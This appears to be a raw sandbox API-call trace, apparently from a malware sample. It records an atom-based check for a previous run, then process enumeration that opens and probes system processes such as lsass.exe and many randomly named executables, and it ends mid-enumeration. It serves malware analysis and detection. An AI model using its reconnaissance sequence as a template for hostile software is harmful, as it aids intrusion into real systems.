	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.813] GetLastError () returned 0x5
	[0083.814] GetLastError () returned 0x5
	[0083.814] GetLastError () returned 0x5
	[0083.814] GetLastError () returned 0x5
	[0083.814] GetLastError () returned 0x5
	[0083.814] GetLastError () returned 0x5
	[0083.814] GetLastError () returned 0x5
	[0083.814] GetLastError () returned 0x5
	[0083.814] GetLastError () returned 0x5
	[0083.814] GetLastError () returned 0x5
	[0083.814] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0083.814] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0083.814] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0083.814] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0083.814] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0083.814] CloseHandle (hObject=0x504) returned 1
	[0083.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0083.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7d99d8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0083.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0083.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7d99d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x504
	[0083.815] IsWow64Process (in: hProcess=0x504, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.815] CloseHandle (hObject=0x504) returned 1
	[0083.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x7d99d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0083.815] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0083.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x7d99d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0083.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16d90) returned 0xc0000004
	[0083.946] VirtualAlloc (lpAddress=0x0, dwSize=0x16e90, flAllocationType=0x3000, flProtect=0x4) returned 0x39f0000
	[0083.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x39f0000, Length=0x16e90, ResultLength=0x0 | out: SystemInformation=0x39f0000, ResultLength=0x0) returned 0x0
	[0083.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0083.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x3956818, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0083.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0083.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39567e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0083.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0083.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x3956770, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0083.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x3956818, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0083.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0083.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x3956770, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0083.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0083.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39567e8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0083.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0083.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x3956890, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0083.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0083.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x3956920, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0083.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x3956908, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0083.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x393e3f0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0083.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0083.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39568a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.950] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0083.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x3956770, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0083.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39567e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0083.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x3956770, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0083.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x3956818, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0083.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x3956878, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0083.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39566e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0083.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39567e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x508
	[0083.952] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.952] CloseHandle (hObject=0x508) returned 1
	[0083.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39567a0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0083.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0083.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x3956860, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.952] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0083.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x3952f10, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0083.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x508
	[0083.953] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.953] CloseHandle (hObject=0x508) returned 1
	[0083.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x3952ed0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0083.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0083.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x3956950, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x508
	[0083.953] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.953] CloseHandle (hObject=0x508) returned 1
	[0083.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39566e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0083.953] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x508
	[0083.953] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.953] CloseHandle (hObject=0x508) returned 1
	[0083.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x3956950, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0083.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x508
	[0083.954] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.954] CloseHandle (hObject=0x508) returned 1
	[0083.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x3956980, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0083.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x508
	[0083.954] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.954] CloseHandle (hObject=0x508) returned 1
	[0083.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x39531d0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0083.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x508
	[0083.954] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.954] CloseHandle (hObject=0x508) returned 1
	[0083.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x3956818, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0083.954] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x508
	[0083.954] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.955] CloseHandle (hObject=0x508) returned 1
	[0083.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x3956950, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0083.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x3956920, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x508
	[0083.955] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.955] CloseHandle (hObject=0x508) returned 1
	[0083.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39566f8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0083.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x508
	[0083.955] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.955] CloseHandle (hObject=0x508) returned 1
	[0083.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x3956770, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.955] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x508
	[0083.956] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.956] CloseHandle (hObject=0x508) returned 1
	[0083.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x3953150, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0083.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0083.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39568c0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0083.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x508
	[0083.956] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.956] CloseHandle (hObject=0x508) returned 1
	[0083.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x3953050, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0083.956] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x508
	[0083.956] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.956] CloseHandle (hObject=0x508) returned 1
	[0083.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x393e3e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0083.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x508
	[0083.957] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.957] CloseHandle (hObject=0x508) returned 1
	[0083.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x3953150, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0083.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x508
	[0083.957] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.957] CloseHandle (hObject=0x508) returned 1
	[0083.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x3954f40, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0083.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x508
	[0083.957] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.957] CloseHandle (hObject=0x508) returned 1
	[0083.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x3953090, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0083.957] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x508
	[0083.957] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.957] CloseHandle (hObject=0x508) returned 1
	[0083.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x3956890, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0083.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x508
	[0083.959] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.959] CloseHandle (hObject=0x508) returned 1
	[0083.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x3956920, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0083.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x508
	[0083.960] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.960] CloseHandle (hObject=0x508) returned 1
	[0083.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x39531d0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0083.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x508
	[0083.960] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.960] CloseHandle (hObject=0x508) returned 1
	[0083.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x3952e90, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0083.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x508
	[0083.960] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.960] CloseHandle (hObject=0x508) returned 1
	[0083.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39566e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0083.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x508
	[0083.961] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.961] CloseHandle (hObject=0x508) returned 1
	[0083.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x3956770, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0083.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x508
	[0083.961] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0083.961] CloseHandle (hObject=0x508) returned 1
	[0083.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x3954e78, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0083.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x508
	[0083.961] IsWow64Process (in: hProcess=0x508, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
